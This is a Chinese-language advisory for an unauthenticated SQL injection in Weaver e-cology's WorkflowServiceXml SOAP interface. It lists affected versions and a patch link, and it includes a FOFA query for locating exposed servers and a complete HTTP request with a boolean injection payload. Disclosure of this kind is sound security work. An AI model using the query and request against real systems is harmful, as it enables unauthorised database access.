漏洞描述:
泛微 e-cology 是泛微公司開發的協同管理應用平臺。泛微 e-cology v10.64.1的/services/接口默認對內網暴露,用于服務調用,未經身份認證的攻擊者可向 /services/WorkflowServiceXml 接口發送惡意的SOAP請求進行SQL注入,攻擊者通過漏洞可以獲取服務器數據庫敏感信息。
漏洞發現時間:
2024-7-12
影響版本:
e-cology9 < 10.64.1
FOFA語法:
app="泛微-OA(e-cology)"
POC:
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/><soapenv:Body><web:getHendledWorkflowRequestList><web:in0>1</web:in0><web:in1>1</web:in1><web:in2>1</web:in2><web:in3>1</web:in3><web:in4><web:string>1=1 AND 5615=5615</web:string></web:in4></web:getHendledWorkflowRequestList></soapenv:Body>
</soapenv:Envelope>
漏洞復現:
修復:
目前官方已有可更新版本,建議受影響用戶升級至最新版本:
https://www.weaver.com.cn/cs/securityDownload.html
參考文獻:
OSCS | 開源軟件供應鏈安全社區 | 讓每一個開源項目變得更安全
POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub